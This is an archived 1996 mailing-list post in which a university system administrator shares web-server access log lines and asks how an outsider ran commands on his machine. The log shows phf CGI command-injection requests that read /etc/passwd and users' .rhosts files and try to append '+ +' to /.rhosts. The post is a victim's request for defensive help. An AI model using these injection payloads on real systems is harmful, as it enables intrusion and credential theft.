hacker? from Oyanarte Portilho on 1996-12-21 (tru64-unix-managers)

From: Oyanarte Portilho <portilho_at_helium.fis.unb.br>
Date: Fri, 20 Dec 1996 18:18:08 -0200

Dear Gurus,

I was examining the access_log file of our httpd web server and found an strange access to
our file system, apparently from a web browser in the address xxx.xxx.xxx.xxx. It looks
like as a hacker sniffing our system. Does anybody have an idea on how this could
have been done and how to prevent it? How can an external internaut run ls, w and cat
commands? See below the important lines:

xxx.xxx.xxx.xxx - - [18/Dec/1996:22:34:35 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/cat "+ +" >>%20/.rhosts HTTP/1.0" 200 80
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:35:00 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/cat%20"+ +" >>%20/.rhosts HTTP/1.0" 200 84
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:26 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laFR%20/ HTTP/1.0" 200 40935
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:34 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20/ HTTP/1.0" 200 492
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:57 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/ HTTP/1.0" 200 3527
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:57:40 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/w HTTP/1.0" 200 220
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:58:31 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/home HTTP/1.0" 200 217
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:00:40 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/users HTTP/1.0" 200 95
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:00:57 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/users HTTP/1.0" 200 95
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:01:01 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/ HTTP/1.0" 200 3527
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:01:14 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users HTTP/1.0" 200 3986
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:02:33 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxx HTTP/1.0" 200 3881
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:03:24 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxx/.rhosts HTTP/1.0" 200 133
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:05:27 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200 1948
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:06:28 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200 3823
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:08:19 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxxxxx/.rhosts HTTP/1.0" 200 128
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:10:54 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200 934
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:11:36 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxxxxxx/.rhosts HTTP/1.0" 200 443
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:13:48 -0200] "GET /cgi-bin/phf HTTP/1.0" 200 1262
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:14:23 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 9765
(null) - - [18/Dec/1996:23:17:43 -0200] "" 500 -
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:17:49 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20/usr/users1 HTTP/1.0" 200 444
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:18:53 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20/usr/users1/xxxxxxxx HTTP/1.0" 200 316
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:21:13 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxx HTTP/1.0" 200 57319
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:23:38 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxx/bin HTTP/1.0" 200 232
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:26:52 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/users1/xxxxxxx/xxxxxx HTTP/1.0" 200 7664
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:27:37 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxt/Mail HTTP/1.0" 200 1559
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:28:26 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxt/.cshrc HTTP/1.0" 200 194
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:28:37 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/users1/xxxxxxt/.cshrc HTTP/1.0" 200 1654
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:06 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%01 HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:19 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%02 HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:59 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%02%03%04%05 HTTP/1.0" 200 85
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:14 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%02%03%04%0b HTTP/1.0" 200 85
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:30 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo50c HTTP/1.0" 200 84
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:54 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%0c HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:21 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%0d HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:34 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%0d HTTP/1.0" 200 80
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:44 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20%0d HTTP/1.0" 200 81

TIA,

        Oyanarte Portilho
        Department of Physics
        University of Brasilia
Received on Fri Dec 20 1996 - 21:33:28 NZDT

This archive was generated by hypermail 2.4.0 : Wed Nov 08 2023 - 11:53:47 NZDT